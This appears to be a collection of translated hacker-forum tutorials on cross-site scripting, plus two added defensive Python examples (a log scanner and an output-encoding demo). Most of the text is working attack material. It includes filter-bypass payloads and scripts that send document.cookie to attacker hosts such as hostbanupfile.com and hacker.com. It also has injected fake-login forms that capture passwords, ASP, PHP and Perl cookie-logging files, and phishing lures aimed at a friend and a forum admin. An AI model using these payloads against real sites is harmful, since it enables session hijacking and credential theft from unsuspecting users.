
Author: Mask_NBTA and Alex chan doi

These are articles on XSS that I collected; I hope they help you understand this
issue a bit better.

First is the article by Mask_NBTA.

XSS basics

How does the flaw occur?

The flaw occurs when a web application accepts dangerous data entered by a hacker.
As you know, a website usually contains links; through these links a hacker can
inject code, and whoever uses such a link is 99% done for. Put simply, through this
flaw a hacker can inject code into a site or a link to steal important information
from the victim. That information may be cookies, or the username + password to
some bank account, which is then sent to the hacker. The hacker's usual trick is to
encode the dangerous parts of the link (the injected code) as HEX (or in other
forms) so the victim is less suspicious when clicking on the dangerous link. After
that comes finding some way to get the victim to click on the baited link; this
depends on each hacker's cunning :-), and the more cunning, the faster the results.

Most web applications today use a cookie tied to a single account for a given user,
meaning each person's cookie is theirs alone to use. Webmail, online shops, banks,
... most of them use cookies to authenticate users, and that is exactly what the
hacker is after.

So what on earth does "inject code" mean, and what do you inject with: Javascript
(the common choice), VBscript, ActiveX, HTML, or Flash.

I guess you roughly understand this flaw now :-). If not, read on and you will.

Now let's talk about this flaw in real detail:

First, a quick introduction to how some of the characters commonly used in XSS in
the ADDRESS bar are encoded, so you are not thrown off later:

-------------------

Since the IBF forum does not support tables in posts, you can see the details in my
write-up here: http://members.lycos.co.uk/masknbta/mask.rtf

--------------------
That's just the basics; if you want to know everything, look it up yourselves.

CHECKING FOR XSS

Now I will lay out the steps you can use to check whether a site is vulnerable to
XSS:

Any site always has one or all of the following parts: search results, error
messages, web forms. XSS flaws mostly live in these parts; in general XSS can occur
anywhere the user can enter data and then gets something back.

To find the flaw cleanly, security experts split the process into 7 steps, but in my
opinion 5 steps are enough:

Step 1: Open the website to be checked (obviously).

Step 2: Start testing. Aim at a search box or a login form and submit some data
(enter something and press submit, login, OK or whatever), for example the word
"Mask_NBTA", or any word at all.

Step 3: Determine whether the site is likely vulnerable to XSS by looking at what
comes back:

For example, you see something like this:

"Your search for 'Mask_NBTA' did not find any items"

"Your search for 'Mask_NBTA' returned the following results"

"User 'Mask_NBTA' is not valid"

"Invalid login 'Mask_NBTA'"

or anything at all that contains the "Mask_NBTA" you entered at the start; then this
site is 99% XSS-able.

There is another form I will also present right away:

+ Look for inputs or variables right in the address bar (var=); whenever you see
these, stuff data into them. Try these scripts:

< script>alert('Mask_NBTA')< /script>

hoc <i*g csstest=javascript:alert('Mask_NBTA')>

hoc &{alert('Mask_NBTA')};



Step 4: Inject actual code into the vulnerable spot:

Inject this < script>alert('Mask_NBTA')< /script> into the box from before and press
SUBMIT. If you then get a popup containing the text "Mask_NBTA", this site is 100%
vulnerable to XSS. But note: occasionally a website is vulnerable to XSS and still
no popup appears; then you have no choice but to VIEW SOURCE and look. When viewing
the source, look for this line < script>alert('Mask_NBTA')< /script>; if it is there,
stop looking, that's XSS right there.

Another, more common example:

Suppose http://sitebiloi.com/ is a site vulnerable to XSS and we found the
vulnerable spot like this:
http://sitebiloi.com/index.php?page=<s...< script> , meaning we can inject code
right in the ADDRESS bar.

I cannot cover every situation; what you need is to understand the problem, and
then you will recognise a flaw when you see one.


EXPLOITATION

With the check done, now we have to find a way to exploit the flaw to get what we
want:

I will show how to grab the victim's cookie through the XSS flaw:

Step 1: create a file cookie.asp with the following content:

----------------------------------------------------------------------------

<%
Set x = CreateObject("Scripting.FileSystemObject")
Set y = x.OpenTextFile(Server.MapPath("mask.txt"), 8, true)
y.WriteLine Request.QueryString("cookie")
y.Close
Set y = Nothing
Set x = Nothing
%>
-------------------------------------------------------------------------------

or a file cookie.php like this:

//////////////////////////////////////////////////////////////////////////////

<?
$f = fopen("mask.txt","a");
fputs($f, $cook.chr(13));
fclose($f);
?>
////////////////////////////////////////////////////////////////////////////////

and upload this file to your host. Note that if you use the .php file you must
upload it to a host that supports PHP (lycos); with the .asp file, to a host that
supports ASP (brinkster).

Step 2:

Taking the example above of a site XSS-able from the address bar, to grab the
victim's cookie we do this:

http://sitebiloi.com/index.php?page=<s...< /script>
and the code is immediately injected into the web page, which then looks like this:

-----------------------------------------------------------

<HTML>
<TITLE> Hello all! </TITLE>
hello

< script>window.open("http://www.hostbanupfile.com/cookie.asp?cookie="+document.cookie)< /script>
...

</HTML>
--------------------------------------------------------------

With this code the browser executes the script and then sends the whole cookie to
you as a .txt file, and you only have to open that file and read it.

But you cannot always inject code so easily; sometimes you have to be a little
flexible, because website programmers will not just let us run wild like that. They
have their own countermeasure, called code filtering (an Anti-XSS filter). Their
mechanism is as follows: the filter strips the special characters the user enters,
simple as that.

Does the hacker give up? Not necessarily! The hacker tries to get past the "filter"
with a few tricks such as:

1/ If the "filter" strips the two characters "<" and ">":

The hacker uses "\x3c" and "\x3e" instead and starts the injected code with ') +

') + '\x3cscript
src=ht*p://hostbanupfile.com/cookie.asp?cookie="+document.cookie\x3e\x3c/script\x3e'


2/ Turning the dangerous code into a comment:

For example, when the hacker enters < script>code< /script>, it is blocked like this:

<COMMENT>
<!--
code (not parsed by the filter)
//-->
</COMMENT>

Getting past this is also very easy, by using the closing tag </COMMENT> to close
that <COMMENT>. That is, we inject this:

< script>

</COMMENT>
<img src="http://none" onerror="alert(Mask_NBTA was here);window.open(
http://sitebanupfile.com/cookie.asp?cookie...cument.cookie); ">
< /script>

at this point the original filtered code becomes:

-----------------------------------------------------------------------

<COMMENT>

</COMMENT>

< /script>
</COMMENT>

--------------------------------------------------------------

and so the filter is neutralised in no time.

This is perfect for hacking webmail by creating a fake login.

3/ No JAVASCRIPT allowed at all:

In this case almost all special characters entered by the user are filtered, so to
get past it the hacker has to encode the code being entered:

Ht*p://sitebiloi.com/search.cgi?query=%26%7balert%28%27Mask %27%29%7d%3b

The string "%26%7balert%28%27Mask%27%29%7d%3b" is just &{alert('Mask')}; in encoded
form.
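As an added defensive example (not from the original article): the encoded probes quoted above only hide from a filter that never decodes, so a log scanner that URL-decodes the query string before matching still spots them, including a double-encoded one. The access-log lines, IP addresses and the host example.invalid are constructed for this demo.

```python
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (common log format) carrying the kinds of
# encoded query strings quoted in the article; IPs and the host
# example.invalid are made up for this demo.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2004:10:00:01 +0000] "GET /search.cgi?query=Mask_NBTA HTTP/1.0" 200 512
10.0.0.7 - - [01/Jan/2004:10:00:02 +0000] "GET /search.cgi?query=%26%7balert%28%27Mask%27%29%7d%3b HTTP/1.0" 200 540
10.0.0.9 - - [01/Jan/2004:10:00:03 +0000] "GET /index.php?page=%3Cscript%3Ewindow.open(%22http://example.invalid/c.asp?c=%22%2Bdocument.cookie)%3C/script%3E HTTP/1.0" 200 610
10.0.0.3 - - [01/Jan/2004:10:00:04 +0000] "GET /banklogin.asp?err=%253C%252Fform%253E%253Cform+action%3D%2522login.asp%2522 HTTP/1.0" 200 700
10.0.0.4 - - [01/Jan/2004:10:00:05 +0000] "GET /index.php?page=about HTTP/1.0" 200 300
"""

# Fragments that should never appear in a decoded query parameter of these pages.
INDICATORS = ("<script", "</form", "document.cookie", "javascript:",
              "onerror=", "onsubmit=", "&{")


def fully_decode(s, max_rounds=3):
    """URL-decode until the string stops changing (bounded), so a
    double-encoded payload (%253C -> %3C -> <) cannot slip past matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def request_target(line):
    """Return the request-target ("/path?query") of one access-log line."""
    start = line.find('"') + 1
    end = line.find('"', start)
    fields = line[start:end].split(" ")
    return fields[1] if len(fields) >= 2 else ""


def xss_indicators(line):
    """Indicators found in the decoded, lower-cased query string of a line."""
    query = urlsplit(request_target(line)).query
    decoded = fully_decode(query).lower()
    return [ind for ind in INDICATORS if ind in decoded]


def scan_log(text):
    """Map the client IP of each suspicious line to the indicators it tripped."""
    hits = {}
    for line in text.splitlines():
        found = xss_indicators(line)
        if found:
            hits[line.split(" ", 1)[0]] = found
    return hits
```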



Let me give a few more examples so you can picture it more easily:

*Forum YABB GOLD 1 SP1 (unpatched) is XSS-able like this:

ht*p://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269<
script>location%3d'Ht*p://www.hostbanupfile.com/cookie.php?Cookie%3d'%2b(docum
ent.cookie)%3b< /script>
, the squiggly characters are in use now (look them up yourselves)



*Forum vBulletin (forget which version):

ht*p://target.com/board/usercp.php?s=[Session ID]">< script>javascript-
:document.write('<img
scr=h*tp://www.hostbanupfile.com/cookie.asp?cookie='+escape(document.cookie)+'>');<
/script>



*Forum PHPBB 1.4.4 (2.0 seems affected too):

register an account, then post a topic, worded so that the admin will read it, so we
can swipe his cookie, like so:

----------------------------------------------------------------------------------------------

Subject : ADMIN , I LOVE U

Body:

your forum is bad, hahaha

[img]javascript:document.write('')[/i*g]

--------------------------------------------------------------------------------

We pull this off by abusing the img tag to inject code. When the admin reads this
topic, his cookie flies straight into our hands. Heh heh!

How to use the cookie we just swiped:

On WIN XP, cookies are stored at: C:\Documents and Settings\your name\cookies\

As for which cookie it is and exactly where, go in and look for it yourselves.

Once found, replace our own cookie with the one we just swiped, then go back to the
forum with that cookie and we are admin. But it seems that if we swipe the cookie
and the admin logs out, the cookie becomes useless; it only works while the admin
has not logged out (not sure I remember this exactly, but roughly that is right).

There are many, many more vulnerable sites + forums on the net; these are just a few
examples so you can picture it.


How to lure the victim into the exact link we want:

To be practical and easy to follow, I will tell you a story about hacking with XSS,
which is also one more XSS scenario:

One day, bored, I was wandering the net and went to some website, say
http://www.a.com/. Out of habit I typed some random data into the USERNAME box, and
what I typed here was Mask_NBTA. I immediately saw the text "Invalid login: user
Mask_NBTA is not found in our data"; heh heh, a symptom of XSS right there. Looking
at the URL bar I saw this
http://www.a.com/login.asp?erro=Invalid%20...in%20our%20data

Great, so now the job is figuring out how to hack it. First I saved this page to my
hard disk, opened it with NOTEPAD and looked at the source. Why did I do that?
Because I wanted to know the two variable names of the login form, and I easily
found them: "ten" and "matkhau". Based on these two I knew what I had to do and how
to inject code, heh heh. What I wanted at this point was to use XSS to get the
victim's username + password. So what to inject? After a moment's thought I decided
to inject this:

</FORM>
<FORM action="fakelogin.asp" method="post"
onsubmit="
image= new Image;
image.scr='h*tp://myhost/cookie.asp?cookie='+document.form(1).ten.value + '/' + document.form(1).matkhau.value;">


I will explain each piece so you understand:

the </FORM> closes the site's FORM that was opened above. As for the code below it,
I guess you understand it all just by looking, no explanation needed.

The code is injected like this:

Ht*p://www.a.com/login.asp?tnbin1=gitrctht1&tnbin2=gitrctht2&tnbin3=
gitrctht3&tnbin4=gitrctht4&erro=%3C/FORM%3E%3CFORM%20action=%2
2login1.asp%22%20method=%22post%22%20onsubmit=%22image%20=%20New%20i
mage;image.scr='h*tp://myhost/cookie.asp?cookie='%20%2bdocument.form(1).ten.value
%20%2b'/'%20%2bdocument.form(1).matkhau.value;%22%2E

Why add a whole pile of real-looking variables? Remember, it is so that when looking
at the URL you do not notice the injected code tacked on at the end; mainly it makes
the link long and squiggly, first to dazzle the victim, and then to give the link a
natural, genuine look.

At this point it occurred to me that a friend of mine is a member of this site, and
since I was free anyway, why not mess with him. What I did was send him a mail with
this content:

Have you heard the news! WEBSITE a.com is running a contest with a prize of
1000 000, right up your alley too, and you don't even know about it. Look at this
link and you will see:

H*tp://www.a.com/login.asp, but underneath this link is actually
http://www.a.com/login.asp?tnbin1=gi..au.value;%22%2E

Guess what happens. Of course he clicks the seemingly harmless link, then logs into
the site as usual, never suspecting that his username + password are ...........

All I have to do is go to my host, open the log file and look at what is in it; it's
a secret ..........

That is the end of the story. I guess you understand my method; hopefully with your
genius minds you will come up with better ways than the one I just presented.



HOW TO PREVENT XSS:

1/ First, for website admins:

+ Do not allow any HTML tag at all in user input.

+ Filter all Active Script out of HTML code.

2/ For users:

Caution above all; don't die of ignorance.

I wrote this article first of all to refresh my own knowledge, and second to explain
clearly to you how harmful XSS is, so you can guard against it.
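An added example, not part of the original article, showing why the two admin measures above have to be context-aware output encoding rather than a character blacklist: it runs the article's own probes through the "strip < and >" filter, through HTML escaping, and through JavaScript string escaping, and checks what a page that reflects the value inside document.write('...') would execute. The template render_search and the checker script_safe are assumptions made for the demo.

```python
import html
import re

# Probes quoted in the article above; constructed test inputs, not live traffic.
PROBE_HTML = "<script>alert('Mask_NBTA')</script>"
PROBE_JS_STRING = ("') + '\\x3cscript src=http://hostbanupfile.com/cookie.asp"
                   "\\x3e\\x3c/script\\x3e'")


def naive_filter(s):
    """The 'anti-XSS filter' the article describes: drop '<' and '>' only."""
    return s.replace("<", "").replace(">", "")


def html_escape(s):
    """Text (HTML body) context: every HTML metacharacter becomes an entity."""
    return html.escape(s, quote=True)


def js_string_escape(s):
    """JS string-literal context: only ASCII letters and digits survive;
    everything else becomes \\uXXXX, so neither a quote nor a backslash
    can end the literal or smuggle in a \\x3c that the engine turns into '<'."""
    return "".join(c if c.isascii() and c.isalnum() else "\\u%04x" % ord(c)
                   for c in s)


def render_search(value):
    """Assumed page template that reflects the query inside a JS string."""
    return "document.write('Your search for " + value + " returned nothing');"


_JS_LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'")


def js_literals(script):
    """Single-quoted literals of a JS statement, with the escapes a browser
    applies (\\xHH, \\uHHHH) decoded the way the JS engine would."""
    return [m[1:-1].encode("latin-1").decode("unicode_escape")
            for m in _JS_LITERAL.findall(script)]


def script_safe(script):
    """Safe only if the reflected value stayed inside the one intended literal
    and the decoded literal holds no '<', so document.write emits no tag."""
    literals = js_literals(script)
    return len(literals) == 1 and "<" not in literals[0]
```

HTML escaping keeps the value inside the literal but leaves \x3c for the JS engine to decode, which is why the check fails for it in a script context: the encoding has to match the context the value lands in.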


Cross-Site Scripting (author not remembered)

Introduction:

How many times have you received an email containing hyperlinks? Think about it:
you get a mail linking to a site you are a member of, with an invitation too sweet
to resist; you click the link without a second thought and log in with your own
account.... and very likely your password has just fallen into a hacker's hands.
That is only a small example of cross-site scripting.

Cross-Site Scripting

Cross-Site Scripting, also called XSS, is a flaw that occurs when web applications
accept dangerous data from hackers, such as a piece of javascript, Vbscript.... It
only helps you obtain confidential information from a web application, no more, no
less (and forget the idea that exploiting this flaw successfully takes just a few
minutes).

XSS can affect sites that let users enter data, typically:

Search tools
Forms filled in by users
Web message boards, guestbooks

A hacker who finds an XSS flaw will try to use it to grab cookies, create fake login
pages to steal other people's passwords, and so on.

Now let's dig into XSS. First, identifying a site with this flaw:

For example, if a site's search tool, after we enter a value (for example: XSS),
returns what we just entered (i.e. prints XSS), it is very likely vulnerable to XSS.
Now we view the source of that site; if we find "XSS" there, the site is definitely
vulnerable, heh heh.

To simulate an XSS attack, an online bank site was created (www.freebank.com).
First the hacker starts looking for a page on this site where a value can be
entered; in the example the hacker finds that when a login fails, the username
shows up in the URL bar like this:
http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20Badlogin (%20 is the
space character)

Next, the hacker checks whether HTML and javascript can be injected into this web
page. Simply replace "Invalid%20Login:%20Badlogin" in the URL above with
<script>alert('XSS')</script>; if we then get a pop-up window with the message XSS,
we can fully exploit this site through XSS. He now has to build a URL that can
capture sensitive information. To build a URL capable of fooling many people, the
hacker has to open the source of the web page (here specifically banklogin.asp) to
put the right thing into the URL:
Here the hacker adds the following code (depending on the case we can substitute
other code)

</form>

<form action="login.asp" method="post"
onsubmit="XSSimage= new Image;
XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;">

once "injected" into the login page, it looks like this: (our code is in italics)

<table>
<tr>
<td bgcolor="#2E7AA3" Style="border:1px solid black " WIDTH ="258" HEIGHT="217">
<form action="login.asp" method="post">
<center>
</form>
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image;
XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;">
<br> Username :<br><input type ="text" name ="login" style="border: 1px solid black; spacing :0"><br>Password:<br>
............................

As we see, the "injected" code has two main parts: one is </form>, to close the
original page's <form>; the other is

<form action="login.asp" method="post"
onsubmit="XSSimage= new Image;
XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;">

Note that <form action="login.asp" method="post"> is no different from the original,
but we add onsubmit, whose effect is to run the javascript when the victim clicks
submit. The victim's information is sent to the link above (www.hacker.com).

Once the code is ready, the hacker now has to put it into the URL:
http://www.freebank.com/banklogin.asp?serviceName=FreebanlCaastAccess&templateN
ame=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.
com&err=%3C%2Fform%3E%0D%0A%3Cform+action%3D%22login.asp%22+method
%3D%22post%22%0D%0Aonsubmit%3D%22XSSimage%3D+new+Image%3B+XSSi
mage.src%3D%27http%3A%2F%2Fhacker.com%2F%27%2Bdocument.forms%281%29
.login.value%2B%27%3A%27%2Bdocument.forms%281%29.password.value%3B%22
%3E%0D%0A

It is easy to see that this URL differs from the one we used to test for XSS; simply
put, this way the URL is long, to reduce the victim's suspicion.

Right, now we send this link to the victim; there are many ways to fool them. After
that just wait and check the log file at

www.hacker.com

The above is just a small example; with everyone's creativity, each of you will have
your own way to exploit it. You can not only take other people's usernames and
passwords but also change product prices on a shopping site, add data, and so on.

I hope this article helps newbies like me understand XSS a bit more. Those of you
who do not yet know what XSS is, after reading this, reread the article by
Mask_NBTA_83. It will help a lot.

Whenever I find more articles about XSS I'll throw in another one, if nobody minds,
heh heh.



In the article above I went over the XSS flaw and how it is exploited; surely you
still remember the javascript the hacker uses to grab the victim's cookie (there are
quite a few, but let me point out the following example)
<script>document.location.replace('http://hacker/payload?c=' + document.cookie)</script>

the php file to record the cookie could look like this:

<?php
$f = fopen("log.txt", "a");
fwrite($f, "IP: {$_SERVER['REMOTE_ADDR']} Ref: {$_SERVER['HTTP_REFERER']} Cookie: {$HTTP_GET_VARS['c']}\n");
fclose($f);
?>

Or here is another example:

<script>document.location.replace('http://hacker/steal.cgi?' + document.cookie);</script>

and here is the source of steal.cgi:

#!/usr/bin/perl

# steal.cgi by David Endler

# Specific to your system
$mailprog = '/usr/sbin/sendmail';

# create log file
open (COOKIES, ">>stolen_cookie_file");

# what the victim sees
print "Content-type: text/html\n\n";

print <<EndOfHTML;
<html><head><title>Cookie stealing</title></head>
<body> your cookie has been stolen hehe
</body>
EndOfHTML

# The QUERY_STRING environment variable should be filled with
# the cookie text after steal.cgi:
# http://www.hacker.com/steal.cgi?XXXXXXX
print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";

# now mail the alert as well so we can start the hijack
open (MAIL, "|$mailprog -t");
print MAIL "To: hacker\@hacker.com\n";
print MAIL "From: cookie_steal\@hacker.com\n";
print MAIL "Subject: Stolen cookie\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
close (MAIL);

Yet another example (by matrix2k):

<script>window.open("http://www.hostbanupfile.com/cookie.asp?cookie="+document.cookie)</script>

file cookie.asp:

<%
Set bien = CreateObject("Scripting.FileSystemObject")
Set taobien = bien.OpenTextFile(Server.MapPath("xss.txt"), 8, true)
taobien.WriteLine Request.QueryString("cookie")
taobien.Close
Set taobien = Nothing
Set bien = Nothing
%>
